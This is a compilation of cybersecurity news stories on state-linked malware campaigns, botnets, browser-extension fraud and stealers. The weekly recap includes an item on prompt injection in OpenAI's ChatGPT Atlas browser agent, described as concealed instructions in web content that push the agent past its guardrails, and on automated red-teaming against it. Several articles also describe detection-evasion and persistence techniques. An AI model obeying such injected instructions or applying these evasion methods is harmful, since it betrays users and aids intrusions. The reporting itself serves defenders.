2026-01-06 AI创业新闻

Russia-Aligned Hackers Abuse Viber to Target Ukrainian Military and Government

The Russia-aligned threat actor known as UAC-0184 has been observed targeting Ukrainian military and government entities by leveraging the Viber messaging platform to deliver malicious ZIP archives. “This organization has continued to conduct high-intensity intelligence gathering activities against Ukrainian military and government departments in 2025,” the 360 Threat Intelligence Center said in a technical report. Also tracked as Hive0156, the hacking group is primarily known for leveraging war-themed lures in phishing emails to deliver Hijack Loader in attacks targeting Ukrainian entities. The malware loader subsequently acts as a pathway for Remcos RAT infections.

The threat actor was first documented by CERT-UA in early January 2024. Subsequent attack campaigns have been found to leverage messaging apps like Signal and Telegram as a delivery vehicle for malware. The latest findings from the Chinese security vendors point to a further evolution of this tactic. The attack chain involves the use of Viber as an initial intrusion vector to distribute malicious ZIP archives containing multiple Windows shortcut (LNK) files disguised as official Microsoft Word and Excel documents to trick recipients into opening them.

The LNK files are designed to serve as a decoy document to the victim to lower their suspicion, while silently executing Hijack Loader in the background by fetching a second ZIP archive (“smoothieks.zip”) from a remote server by means of a PowerShell script. The attack reconstructs and deploys Hijack Loader in memory through a multi-stage process that employs techniques like DLL side-loading and module stomping to evade detection by security tools. The loader then scans the environment for installed security software, such as those related to Kaspersky, Avast, BitDefender, AVG, Emsisoft, Webroot, and Microsoft, by calculating the CRC32 hash of the corresponding program. Besides establishing persistence by means of scheduled tasks, the loader takes steps to subvert static signature detection before covertly executing Remcos RAT by injecting it into “chime.exe.” The remote administration tool grants the attackers the ability to manage the endpoint, execute payloads, monitor activities, and steal data.

“Although marketed as legitimate system management software, its powerful intrusive capabilities make it frequently used by various malicious attackers for cyber espionage and data theft activities,” the 360 Threat Intelligence Center said. “Through the graphical user interface (GUI) control panel provided by Remcos, attackers can perform batch automated management or precise manual interactive operations on the victim’s host.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Kimwolf Android Botnet Infects Over 2 Million Devices via Exposed ADB and Proxy Networks

The botnet known as Kimwolf has infected more than 2 million Android devices by tunneling through residential proxy networks, according to findings from Synthient. “Key actors involved in the Kimwolf botnet are observed monetizing the botnet through app installs, selling residential proxy bandwidth, and selling its DDoS functionality,” the company said in an analysis published last week. Kimwolf was first publicly documented by QiAnXin XLab last month, while documenting its connections to another botnet known as AISURU. Active since at least August 2025, Kimwolf is assessed to be an Android variant of AISURU.

There is growing evidence to suggest that the botnet is actually behind a series of record-setting DDoS attacks late last year. The malware turns infected systems into conduits for relaying malicious traffic and orchestrating distributed denial-of-service (DDoS) attacks at scale. The vast majority of the infections are concentrated in Vietnam, Brazil, India, and Saudi Arabia, with Synthient observing approximately 12 million unique IP addresses per week. Attacks distributing the botnet have been primarily found to target Android devices running an exposed Android Debug Bridge (ADB) service using a scanning infrastructure that uses residential proxies to install the malware.

No less than 67% of the devices connected to the botnet are unauthenticated and have ADB enabled by default. It’s suspected that these devices come pre-infected with software development kits (SDKs) from proxy providers so as to surreptitiously enlist them in the botnet. The top compromised devices include unofficial Android-based smart TVs and set-top boxes. As recently as December 2025, Kimwolf infections have leveraged proxy IP addresses offered for rent by China-based IPIDEA, which implemented a security patch on December 27 to block access to local network devices and various sensitive ports.

IPIDEA describes itself as the “world’s leading provider of IP proxy” with more than 6.1 million daily updated IP addresses and 69,000 daily new IP addresses. In other words, the modus operandi is to leverage IPIDEA’s proxy network and other proxy providers, and then tunnel through the local networks of systems running the proxy software to drop the malware. The main payload listens on port 40860 and connects to 85.234.91[.]247:1337 to receive further commands. “The scale of this vulnerability was unprecedented, exposing millions of devices to attacks,” Synthient said.

Furthermore, the attacks infect the devices with a bandwidth monetization service known as Plainproxies Byteconnect SDK, indicating broader attempts at monetization. The SDK uses 119 relay servers that receive proxy tasks from a command-and-control server, which are then executed by the compromised device. Synthient said it detected the infrastructure being used to conduct credential-stuffing attacks targeting IMAP servers and popular online websites. “Kimwolf’s monetization strategy became apparent early on through its aggressive sale of residential proxies,” the company said.

“By offering proxies as low as 0.20 cents per GB or $1.4K a month for unlimited bandwidth, it would gain early adoption by several proxy providers.” “The discovery of pre-infected TV boxes and the monetization of these bots through secondary SDKs like Byteconnect indicates a deepening relationship between threat actors and commercial proxy providers.” To counter the risk, proxy providers are recommended to block requests to RFC 1918 addresses, which are private IP address ranges defined for use in private networks. Organizations are advised to lock down devices running unauthenticated ADB shells to prevent unauthorized access. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

⚡ Weekly Recap: IoT Exploits, Wallet Breaches, Rogue Extensions, AI Abuse & More

The year opened without a reset. The same pressure carried over, and in some places it tightened. Systems people assume are boring or stable are showing up in the wrong places. Attacks moved quietly, reused familiar paths, and kept working longer than anyone wants to admit.

This week’s stories share one pattern. Nothing flashy. No single moment. Just steady abuse of trust — updates, extensions, logins, messages — the things people click without thinking.

That’s where damage starts now. This recap pulls those signals together. Not to overwhelm, but to show where attention slipped and why it matters early in the year. ⚡ Threat of the Week RondoDox Botnet Exploits React2Shell Flaw — A persistent nine-month-long campaign has targeted Internet of Things (IoT) devices and web applications to enroll them into a botnet known as RondoDox.

As of December 2025, the activity has been observed leveraging the recently disclosed React2Shell (CVE-2025-55182, CVSS score: 10.0) flaw as an initial access vector. React2Shell is the name assigned to a critical security vulnerability in React Server Components (RSC) and Next.js that could allow unauthenticated attackers to achieve remote code execution on susceptible devices. According to statistics from the Shadowserver Foundation, there are about 84,916 instances that remain susceptible to the vulnerability as of January 4, 2026, out of which 66,200 instances are located in the U.S., followed by Germany (3,600), France (2,500), and India (1,290). A New Framework for Identity Security in the AI Era In 2026, the security landscape is littered with unmanaged threats, including AI tools, SaaS apps, devices, and identities.

Join 1Password CPO Abe Ankumah and security analyst Francis Odum to hear how security and IT leaders are taking control – without slowing down the pace of innovation. Join the webinar ➝ 🔔 Top News Trust Wallet Chrome Extension Hack Traced to Shai-Hulud Supply Chain Attack — Trust Wallet revealed that the second iteration of the Shai-Hulud (aka Sha1-Hulud) supply chain outbreak in November 2025 was likely responsible for the hack of its Google Chrome extension, ultimately resulting in the theft of approximately $8.5 million in assets. “Our Developer GitHub secrets were exposed in the attack, which gave the attacker access to our browser extension source code and the Chrome Web Store (CWS) API key,” the company said. “The attacker obtained full CWS API access via the leaked key, allowing builds to be uploaded directly without Trust Wallet’s standard release process, which requires internal approval/manual review.” The unknown threat actors are said to have registered a domain to exfiltrate users’ wallet mnemonic phrases.

Koi’s analysis found that directly querying the server to which the data was exfiltrated returned the response “He who controls the spice controls the universe,” a Dune reference that echoes similar references observed in the Shai-Hulud npm incident. There is evidence to suggest that preparations for the hack were underway since at least December 8, 2025. DarkSpectre Linked to Massive Browser Extension Campaigns — A newly uncovered Chinese threat group, DarkSpectre, has been linked to one of the most widespread browser-extension malware operations discovered to date, compromising more than 8.8 million users of Chrome, Edge, Firefox, and Opera over the past seven years. DarkSpectre’s structure differs from that of traditional cybercrime operations.

The group has been found to run disparate but interconnected malware clusters, each with distinct goals. The ShadyPanda campaign, responsible for 5.6 million infections, focuses on long-term user surveillance and e-commerce affiliate fraud. The second campaign, GhostPoster, spreads via Firefox and Opera extensions that conceal malicious payloads in PNG images via steganography. After lying dormant for several days, the extensions extract and execute JavaScript hidden within images, enabling stealthy remote code execution.

This campaign has affected over one million users and relies on domains like gmzdaily.com and mitarchive.info for payload delivery. The most recent discovery, The Zoom Stealer, exposes around 2.2 million users to corporate espionage. The discovery reveals a highly organized criminal organization that has devoted itself to steadily churning out legitimate-looking browser extensions that sneak in malicious code. U.S.

Treasury Lifts Sanctions on 3 Individuals Connected to Intellexa — The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) removed three individuals linked to the Intellexa Consortium, the holding company behind a commercial spyware known as Predator, from the specially designated nationals list. They included Merom Harpaz, Andrea Nicola Constantino Hermes Gambazzi, and Sara Aleksandra Fayssal Hamou. In a statement shared with Reuters, the Treasury said the removal “was done as part of the normal administrative process in response to a petition request for reconsideration.” The department added that the individuals had “demonstrated measures to separate themselves from the Intellexa Consortium.” Silver Fox Strikes India with Tax Lures — The Chinese cybercrime group known as Silver Fox has turned its focus to India, using income tax-themed lures in phishing campaigns to distribute a modular remote access trojan called ValleyRAT (aka Winos 4.0).

In the campaign, phishing emails containing decoy PDFs purported to be from India’s Income Tax Department are used to deploy ValleyRAT, a variant of Gh0st RAT that implements a plugin-oriented architecture to extend its functionality in an ad hoc manner, thereby allowing its operators to deploy specialized capabilities to facilitate keylogging, credential harvesting, and defense evasion. The disclosure came as a link management panel associated with Silver Fox was identified as being used to keep track of the web pages used to deliver fake installers containing ValleyRAT and the number of clicks to download the installers. An analysis of the origin IP addresses that have clicked on the download links has revealed that at least 217 clicks originated from China, followed by the U.S. (39), Hong Kong (29), Taiwan (11), and Australia (7).

Mustang Panda Uses Rootkit Driver to Deliver TONESHELL — The Chinese hacking group known as Mustang Panda (aka HoneyMyte) leveraged a previously undocumented kernel-mode rootkit driver to deliver a new variant of backdoor dubbed TONESHELL in a cyber attack detected in mid-2025 targeting an unspecified entity in Asia. The main objective of the driver is to inject a backdoor trojan into the system processes and provide protection for malicious files, user-mode processes, and registry keys. The final payload deployed as part of the attack is TONESHELL, an implant with reverse shell and downloader capabilities to fetch next-stage malware onto compromised hosts. The use of TONESHELL has been attributed to Mustang Panda since at least late 2022.

The command-and-control (C2) infrastructure used for TONESHELL is said to have been erected in September 2024, although there are indications that the campaign itself did not commence until February 2025. ‎️‍🔥 Trending CVEs Hackers act fast. They can use new bugs within hours. One missed update can cause a big breach.

Here are this week’s most serious security flaws. Check them, fix what matters first, and stay protected. This week’s list includes — CVE-2025-13915 (IBM API Connect), CVE-2025-52691 (SmarterTools SmarterMail), CVE-2025-47411 (Apache StreamPipes), CVE-2025-48769 (Apache NuttX RTOS), CVE-2025-14346 (WHILL Model C2 Electric Wheelchairs and Model F Power Chairs), CVE-2025-52871, CVE-2025-53597 (QNAP), CVE-2025-59887, and CVE-2025-59888 (Eaton UPS Companion). 📰 Around the Cyber World 200 Security Incidents Target Crypto in 2025 — According to “incomplete statistics” from blockchain security firm SlowMist, 200 security breaches occurred last year, impacting the crypto community, resulting in losses of around $2.935 billion.

“In comparison, 2024 saw 410 incidents with around $2.013 billion in losses,” the company said . “While the number of incidents declined year-over-year, the total amount of losses increased by approximately 46%.” PyPI Says 52% of Active Users Have 2FA Enabled — The Python Software Foundation said 52% of active PyPI users are now using two-factor authentication to secure their accounts, and that more than 50,000 projects are using trusted publishing. Some of the other notable security measures rolled out in the Python Package Index (PyPI) include warning users about untrusted domains, preventing attacks involving malicious ZIP files, flagging potential typosquatting attempts during project creation, periodically checking for expired domains to prevent domain resurrection attacks, and prohibiting registrations from specific domains that were a source of abuse. TikTok Takes Down Influence Network Targeting Hungary — TikTok said it took down a network of 95 accounts with 131,342 followers that operated from Hungary and targeted audiences in the country.

“The individuals behind this network created inauthentic accounts in order to amplify narratives favorable to the Fidesz political party,” the social media platform said. “The network was found to coordinate across multiple online platforms.” Handala Team Breaches Telegram Account of Israeli Officials — The pro-Iranian group known as Handala broke into the Telegram accounts of two prominent Israeli political figures, including former Prime Minister Naftali Bennett and Tzachi Braverman, Netanyahu’s Chief of Staff. “The most probable attack vectors include social engineering or spear phishing targeting passwords and OTPs, the exfiltration of Telegram Desktop session files (tdata) from compromised workstations, or unauthorized access to cloud backups,” KELA said . “While the scope of the breach was likely exaggerated by Handala, the incident highlights the critical need for session management and MFA, even on ‘secure’ messaging apps.” In late November 2025, the group also published a list of Israeli high-tech and aerospace professionals, misleadingly describing them as criminals.

Flaws in Bluetooth Headphones Using Airoha Chips Detailed — More details have emerged about three vulnerabilities impacting Bluetooth headphones using Airoha chips: CVE-2025-20700, CVE-2025-20701, and CVE-2025-20702. The flaws impacted headphones from Sony, Marshall, JBL, and Beyerdynamic, and were patched back in June. The issues could be exploited by an attacker in physical proximity to silently connect to a pair of headphones via BLE or Classic Bluetooth, exfiltrate the flash memory of the headphones, and extract the Bluetooth Link Key. This, in turn, allows the attacker to impersonate a “Bluetooth” device, connect to a target’s phone, and interact with it from the privileged position of a trusted peripheral, including even eavesdropping on conversations and extracting call history and stored contacts.

Ransomware Turns Breaches into Bidding Wars — Ransomware’s evolution from digital extortion into a “structured, profit-driven criminal enterprise” has paved the way for an ecosystem that not only attempts to ransom stolen data, but also monetizes for maximum profit by selling it to the highest bidder through data auctions. “By opening additional profit streams and attracting more participants, these actors are amplifying both the frequency and impact of ransomware operations,” Rapid7 said . “The rise of data auctions reflects a maturing underground economy, one that mirrors legitimate market behavior, yet drives the continued expansion and professionalization of global ransomware activity.” Teams Notifications Abused for Callback Phishing — Threat actors are abusing #Microsoft Teams notifications for callback phishing attacks. “Victims are invited to groups where team names contain the scam content, such as fake invoices, auto-renewal notices, or PayPal payment claims, and are urged to call a fake support number if the charge was not authorized.

Because these messages come from the official Microsoft Teams sender address (no-reply@teams.mail[.]microsoft), they may bypass user suspicion and email filters,” Trustwave said . Teams Vishing Attack Leads to .NET Malware — In another campaign spotted by the security vendor, a vishing campaign originating from Teams has been found to trick unsuspecting users into installing Quick Assist software, ultimately leading to the deployment of a multi-stage .NET malware using an executable named updater.exe. “The Victim receives a Teams call from an attacker impersonating Senior IT Staff,” it said . “Attacker convinces user to launch Quick Assist.

The ‘updater.exe’ is a .NET Core 8.0 wrapper with embedded “loader.dll” that downloads encryption keys from jysync[.]info, retrieves encrypted payload, decrypts using AES-CBC + XOR, then loads assembly directly into memory for fileless execution via reflection.” SEO Poisoning Distributes Oyster — A search engine optimization (SEO) poisoning campaign has continued to promote fake sites when users search for Microsoft Teams or Google Meet to distribute a backdoor called Oyster . This malware distribution threat has been active since at least November 2024. In July 2025, Arctic Wolf said it observed a similar wave of attacks that leveraged bogus sites hosting trojanized versions of legitimate tools like PuTTY and WinSCP to deliver the malware. Oyster is delivered via a loader component that’s responsible for dropping the main component.

The main payload then gathers system information, communicates with a C2 server, and provides the ability to remotely execute code. Fake SAP Concur Extensions Deliver FireClient Malware — A new campaign discovered by BlueVoyant is deceiving users into downloading fake SAP Concur browser extensions. The fake browser extension installer contains a loader designed to gather host information and send it to its C2 server. The loader subsequently extracts an embedded backdoor called FireClient that contains functionality to execute remote commands using the command console and PowerShell.

It’s assessed that the malware is distributed via malvertising, hijacking search queries for “Concur log in” on search engines like Bing. The starting point is an MSI installer that deploys a portable version of Firefox to the directory “LOCALAPPDATA\Programs\Firefox” in a deliberate effort to evade detection and avoid conflicts with existing Firefox installations. “After installation, the MSI file launches Firefox in headless mode, meaning the browser runs without a visible window, making its execution undetectable to the user,” researchers Joshua Green and Thomas Elkins said . “Once Firefox is running, the user’s default browser is opened and redirected to the legitimate Concur website.

This tactic is intended to create the illusion that the extension installation was successful, thereby deceiving the user.” In the background, the malware proceeds to overwrite configuration files located within Firefox profile directories to induce the browser to launch the loader DLL. BlueVoyant’s analysis has uncovered tactical and infrastructural overlaps with GrayAlpha (aka FIN7), which was previously observed leveraging fake browser update websites as part of its operations. “The FireClient malware likely represents a sophisticated component of GrayAlpha’s evolving toolkit, deployed within a multi-pronged campaign leveraging a variety of trusted software lures,” the company said. OpenAI Says Prompt Injections May Never Go Away in Browser Agents — OpenAI disclosed that it shipped a security update to its ChatGPT Atlas browser with a newly adversarially trained model and strengthened surrounding safeguards to better combat prompt injections, which makes it possible to conceal malicious instructions within online content and cause the artificial intelligence (AI) agent to override its guardrails.

The company conceded that “agent mode” in ChatGPT Atlas broadens the security threat surface. “This update was prompted by a new class of prompt-injection attacks uncovered through our internal automated red teaming,” it said. The AI company said it built an LLM-based automated attacker and trained it with reinforcement learning to look for prompt injections that can successfully attack a browser agent. “Prompt injection, much like scams and social engineering on the web, is unlikely to ever be fully ‘solved,’” it added.

“But we’re optimistic that a proactive, highly responsive rapid response loop can continue to materially reduce real-world risk over time. By combining automated attack discovery with adversarial training and system-level safeguards, we can identify new attack patterns earlier, close gaps faster, and continuously raise the cost of exploitation.” The changes are in line with similar approaches undertaken by Anthropic and Google to fight the persistent risk of prompt-based attacks. The development comes as Microsoft revealed that adversaries have begun implementing AI across a range of malicious activities, including automated vulnerability discovery or phishing campaigns, malware or deepfake generation, data analysis, influence operations, and crafting convincing fraudulent messages. “AI-automated phishing emails achieved 54% click-through rates compared to 12% for standard attempts – a 4.5x increase,” it said .

“AI enables more targeted phishing and better phishing lures.” 🎥 Cybersecurity Webinars Defeating “Living off the Land”: Proactive Security for 2026

• To stay ahead of evolving threats, defenders must move beyond traditional file-based detection toward proactive, AI-powered visibility. This session reveals how to catch “living off the land” and fileless attacks that use legitimate system tools to bypass legacy security. You’ll learn how to secure developer workflows and encrypted traffic using Zero Trust principles, ensuring that even the most stealthy, binary-less threats are neutralized before they reach your endpoints. How to Scale AI Agents Without Scaling Your Attack Surface
• As developers use AI agents like Claude Code and Copilot to ship code at warp speed, they are unknowingly introducing new risks through unmanaged “MCP” servers and hidden API keys.

This webinar explains how to secure these autonomous tools before they become backdoors for data theft or remote attacks. Join us to learn how to identify malicious tools in your environment and enforce the security policies needed to keep your organization fast but safe. Scaling Your MSSP: High-Margin CISO Services Powered by AI

• In 2026, staying competitive as an MSSP requires moving beyond manual labor to AI-driven security management. This session explores how leading providers are using automation to slash workloads and deliver high-value CISO services without increasing headcount.

By joining industry experts David Primor and Chad Robinson, you’ll learn proven strategies to package tier-based offerings, boost profit margins, and empower your existing team to deliver expert-level results at scale. 🔧 Cybersecurity Tools rnsec

• It is a lightweight command-line security scanner for React Native and Expo apps. It runs with no configuration, analyzes the code statically, and flags common security issues such as hardcoded secrets, insecure storage, weak crypto, and unsafe network usage. Results are delivered as a simple HTML or JSON report, making it easy to review locally or plug into CI pipelines.

Duplicati

• It is a free, open-source backup tool that encrypts your data before sending it to cloud storage or remote servers. It supports incremental and compressed backups, runs on Windows, macOS, and Linux, and works with many providers like S3, Google Drive, OneDrive, and SFTP. Backups can be scheduled automatically and managed through a simple web interface or the command line. Disclaimer: These tools are for learning and research only.

They haven’t been fully tested for security. If used the wrong way, they could cause harm. Check the code first, test only in safe places, and follow all rules and laws. Conclusion What matters is not any single incident, but what they show together.

The same weaknesses keep getting tested from different angles. When something works once, it gets reused, copied, and scaled. That pattern is clear before the details even matter. Use this recap as a check, not a warning.

If these issues feel familiar, that’s the point. Familiar problems are the ones most likely to be missed again. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

The State of Cybersecurity in 2025: Key Segments, Insights, and Innovations

Featuring: Cybersecurity is being reshaped by forces that extend beyond individual threats or tools. As organizations operate across cloud infrastructure, distributed endpoints, and complex supply chains, security has shifted from a collection of point solutions to a question of architecture, trust, and execution speed. This report examines how core areas of cybersecurity are evolving in response to that shift. Across authentication, endpoint security, software supply chain protection, network visibility, and human risk, it explores how defenders are adapting to adversaries that move faster, blend technical and social techniques, and exploit gaps between systems rather than weaknesses in any single control.

Download the Full Report Here: https://papryon.live/report Authentication — Yubico Authentication is evolving from password-based verification to cryptographic proof of possession. As phishing and AI-driven impersonation scale, identity has become the primary control point for security. Hardware-backed authentication and passkeys are emerging as the most reliable defense against credential theft. “Hackers aren’t breaking in — they’re logging in.

In an AI-driven threat environment, authentication has to be hardware-bound and phishing-resistant.” — Ronnie Manning, Chief Brand Advocate, Yubico Website: yubico.com LinkedIn: https://www.linkedin.com/company/yubico/ SaaS Data Security — Metomic As organizations rely on dozens of SaaS platforms, sensitive data is increasingly fragmented and overexposed. Traditional governance models struggle to track unstructured, collaborative data — especially as AI tools ingest and interpret it automatically. “Most companies don’t know where their sensitive data is, who has access to it, or what their AI tools are doing with it.” — Ben van Enckevort, CTO & Co-founder, Metomic Website: Metomic.io LinkedIn: https://www.linkedin.com/company/metomic/ Network Detection & Response — Corelight Encrypted traffic and hybrid infrastructure have made network visibility harder — but also more essential. Network telemetry remains the most objective record of attacker behavior, enabling defenders to reconstruct incidents and validate what truly happened.

“As AI reshapes security, the organizations that win will be those that know, and can prove, exactly what happened on their network.” — Vincent Stoffer, Field CTO, Corelight Website: Corelight.com LinkedIn: https://www.linkedin.com/company/corelight/ AI in Cybersecurity — Axiado Attack velocity now exceeds the capabilities of software-only defenses. This is driving security closer to the hardware layer, where AI can monitor and respond at the source of computation — before attackers establish control. “Software-only security can’t keep up. The future of defense is hardware-anchored and AI-driven.” — Gopi Sirineni, Founder & CEO, Axiado Website: Axiado.com LinkedIn: https://www.linkedin.com/company/axiado/ Human Risk Management — usecure Most breaches still involve human behavior, yet traditional awareness training has failed to reduce risk meaningfully.

Human risk management is shifting toward continuous measurement, behavioral insight, and adaptive intervention. “Human risk management is about understanding why risky behavior happens — and changing it over time.” — Jordan Daly, Chief Marketing Officer, usecure Website: usecure.io LinkedIn: https://www.linkedin.com/company/usecure/ Network Security — SecureCo Even encrypted communications leak valuable metadata. Attackers increasingly rely on traffic analysis rather than decryption to map networks and plan attacks. Securing data in transit now requires concealing context, not just content.

“Adversaries don’t need to break encryption to map a network — they can track patterns, endpoints, and behaviors.” — Eric Sackowitz, CTO & Co-Founder, SecureCo Website: secureco.io LinkedIn: https://www.linkedin.com/company/secureco/ Software Supply Chain Security — Unknown Cyber Modern software supply chains increasingly deliver compiled binaries assembled from open-source, third-party, and AI-generated components — often without full visibility. Binary-level verification is emerging as the most reliable way to establish trust in what software actually does once it enters an environment. “The problem is limited visibility into software supply chains — and that problem is only amplified with the rise of open-source and AI-generated code.” — James Hess, Founder & CEO, Unknown Cyber Website: unknowncyber.com LinkedIn: https://www.linkedin.com/company/unknown-cyber/ Open-Source Intelligence (OSINT) — ShadowDragon OSINT has moved from manual research to targeted, real-time investigation. Ethical, selector-based collection is replacing bulk scraping, enabling defensible intelligence without data hoarding or predictive profiling.

“Most organizations still underestimate how much threat activity is detectable through publicly available data.” — Jonathan Couch, CEO, ShadowDragon Website: shadowdragon.io LinkedIn: https://www.linkedin.com/company/shadowdragon/ Endpoint Security & Threat Detection — CrowdStrike Attackers now move laterally within minutes, making speed the defining factor in breach prevention. Endpoint security is consolidating around behavioral telemetry, automation, and adversary intelligence. “We’re up against time when it comes to the more sophisticated threat actors.” — Zeki Turedi, Field CTO Europe, CrowdStrike Website: crowdstrike.com LinkedIn: https://www.linkedin.com/company/crowdstrike/ Autonomous Endpoint Security — SentinelOne As environments decentralize, security teams are prioritizing autonomous platforms that reduce manual effort and accelerate response. AI-driven investigation and natural-language querying are becoming operational necessities.

“We’re trying to simplify our AI for our customers so they can better digest it.” — Meriam El Ouazzani, Regional Sales Senior Director, SentinelOne Website: sentinelone.com LinkedIn: https://www.linkedin.com/company/sentinelone/ Download The Full Report Here: https://papryon.live/report Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Bitfinex Hack Convict Ilya Lichtenstein Released Early Under U.S. First Step Act

Ilya Lichtenstein, who was sentenced to prison last year for money laundering charges in connection with his role in the massive hack of cryptocurrency exchange Bitfinex in 2016, said he has been released early. In a post shared on X last week, the 38-year-old announced his release, crediting U.S. President Donald Trump’s First Step Act. According to the Federal Bureau of Prisons’ inmate locator , Lichtenstein is scheduled for release on February 9, 2026.

“I remain committed to making a positive impact in cybersecurity as soon as I can,” Lichtenstein added. “To the supporters, thank you for everything. To the haters, I look forward to proving you wrong.” The First Step Act , passed by the Trump administration in 2018, is a bipartisan legislation that aims to improve criminal justice outcomes and reduce the federal prison population through a series of reforms, including by establishing a “risk and needs assessment system” to determine the recidivism risk and chart a way forward for an early release in some cases. Lichtenstein and his wife, Heather Rhiannon “Razzlekhan” Morgan, pleaded guilty to the Bitfinex hack in 2023, following their arrest in February 2022.

The 2016 security breach enabled Lichtenstein to fraudulently authorize more than 2,000 transactions, transferring 119,754 bitcoin (then worth approximately $71 million) from Bitfinex to a cryptocurrency wallet in his control. Law enforcement authorities also recovered approximately 94,000 bitcoin (valued at around $3.6 billion in 2022), making it one of the largest seizures in the history of the U.S. In January 2025, U.S. prosecutors filed a motion for the recovered assets to be returned to Bitfinex.

Blockchain intelligence firm TRM Labs said Lichtenstein exploited a vulnerability in Bitfinex’s multi-signature withdrawal setup to initiate and authorize withdrawals from Bitfinex without requiring approvals from BitGo, a third-party digital asset trust company. While the illicit proceeds were subsequently converted to other cryptocurrencies and funneled through mixing services like Bitcoin Fog, the couple’s role came to light following the purchase of Walmart gift cards using the stolen bitcoin at an unnamed virtual currency exchange. The gift cards were redeemed using Walmart’s iPhone app under an account in Morgan’s name. Lichtenstein was sentenced to five years in prison in November 2024.

Morgan, who was sentenced to 18 months of incarceration shortly after, posted on X in late October 2025, stating she was released “like a month ago” and that “prison was chill enough.” In a statement shared with CNBC, a Trump administration official said Lichtenstein “served significant time on his sentence and is currently on home confinement consistent with statute and Bureau of Prisons policies.” Morgan also acknowledged the news with a message on X, saying , “The best New Years present I could get was finally having my husband home after 4 years of being apart.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Traditional Firewalls Are Obsolete in the AI Era

New VVS Stealer Malware Targets Discord Accounts via Obfuscated Python Code

Cybersecurity researchers have disclosed details of a new Python-based information stealer called VVS Stealer (also styled as VVS $tealer) that’s capable of harvesting Discord credentials and tokens. The stealer is said to have been on sale on Telegram as far back as April 2025, according to a report from Palo Alto Networks Unit 42. “VVS stealer’s code is obfuscated by Pyarmor,” researchers Pranay Kumar Chhaparwal and Lee Wei Yeong said . “This tool is used to obfuscate Python scripts to hinder static analysis and signature-based detection.

Pyarmor can be used for legitimate purposes and also leveraged to build stealthy malware.” Advertised on Telegram as the “ultimate stealer,” it’s available for €10 ($11.69) for a weekly subscription. It can also be purchased at different pricing tiers: €20 ($23) for a month, €40 ($47) for three months, €90 ($105) for a year, and €199 ($232) for a lifetime license, making it one of the cheapest stealers for sale. According to a report published by Deep Code in late April 2025, the stealer is believed to be the work of a French-speaking threat actor, who is also active in stealer-related Telegram groups such as Myth Stеaler and Еуes Steаlеr GC. The Pyarmor-protected VVS Stealer malware is distributed as a PyInstaller package.

Once launched, the stealer sets up persistence by adding itself to the Windows Startup folder to ensure that it’s automatically launched following a system reboot. It also displays fake “Fatal Error” pop-up alerts that instruct users to restart their computers to resolve an error and steal a wide range of data - Discord data (tokens and account information) Web browser data from Chromium and Firefox (cookies, history, passwords, and autofill information) Screenshots VVS Stealer is also designed to perform Discord injection attacks so as to hijack active sessions on the compromised device. To achieve this, it first terminates the Discord application, if it’s already running. Then, it downloads an obfuscated JavaScript payload from a remote server that’s responsible for monitoring network traffic via the Chrome DevTools Protocol ( CDP ).

“Malware authors are increasingly leveraging advanced obfuscation techniques to evade detection by cybersecurity tools, making their malicious software harder to analyze and reverse-engineer,” the company said. “Because Python is easy for malware authors to use and the complex obfuscation used by this threat, the result is a highly effective and stealthy malware family.” The disclosure comes as Hudson Rock detailed how threat actors are using information stealers to siphon administrative credentials from legitimate businesses and then leverage their infrastructure to distribute the malware via ClickFix -style campaigns, creating a self-perpetuating loop. “A significant percentage of domains hosting these campaigns are not malicious infrastructure set up by attackers, but legitimate businesses whose administrative credentials were stolen by the very infostealers they are now distributing,” the company said . Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Transparent Tribe Launches New RAT Attacks Against Indian Government and Academia

The threat actor known as Transparent Tribe has been attributed to a fresh set of attacks targeting Indian governmental, academic, and strategic entities with a remote access trojan (RAT) that grants them persistent control over compromised hosts. “The campaign employs deceptive delivery techniques, including a weaponized Windows shortcut (LNK) file masquerading as a legitimate PDF document and embedded with full PDF content to evade user suspicion,” CYFIRMA said in a technical report. Transparent Tribe, also called APT36, is a hacking group that’s known for mounting cyber espionage campaigns against Indian organizations. Assessed to be of Indian origin, the state-sponsored adversary has been active since at least 2013.

The threat actor boasts of an ever-evolving arsenal of RATs to realize its goals. Some of the trojans put to use by Transparent Tribe in recent years include CapraRAT , Crimson RAT , ElizaRAT , and DeskRAT . The latest set of attacks began with a spear-phishing email containing a ZIP archive with a LNK file disguised as a PDF. Opening the file triggers the execution of a remote HTML Application (HTA) script using “mshta.exe” that decrypts and loads the final RAT payload directly in memory.

In tandem, the HTA downloads and opens a decoy PDF document so as not to arouse users’ suspicion. “After decoding logic is established, the HTA leverages ActiveX objects, particularly WScript.Shell, to interact with the Windows environment,” CYFIRMA noted. “This behavior demonstrates environment profiling and runtime manipulation, ensuring compatibility with the target system and increasing execution reliability techniques commonly observed in malware abusing ‘mshta.exe.’” A noteworthy aspect of the malware is its ability to adapt its persistence method based on the antivirus solutions installed on the infected machine - If Kapsersky is detected, it creates a working directory under “C:\Users\Public\core\,” writes an obfuscated HTA payload to disk, and establishes persistence by dropping a LNK file in the Windows Startup folder that, in turn, launches the HTA script using “mshta.exe” If Quick Heal is detected, it establishes persistence by creating a batch file and a malicious LNK file in the Windows Startup folder, writing the HTA payload to disk, and then calling it using the batch script If Avast, AVG, or Avira are detected, it works by directly copying the payload into the Startup directory and executing it If no recognized antivirus solution is detected, it falls back to a combination of batch file execution, registry based persistence, and payload deployment prior to launching the batch script The second HTA file includes a DLL named “iinneldc.dll” that functions as a fully-featured RAT, supporting remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control. “APT36 (Transparent Tribe) remains a highly persistent and strategically driven cyber-espionage threat, with a sustained focus on intelligence collection targeting Indian government entities, educational institutions, and other strategically relevant sectors,” the cybersecurity company said.

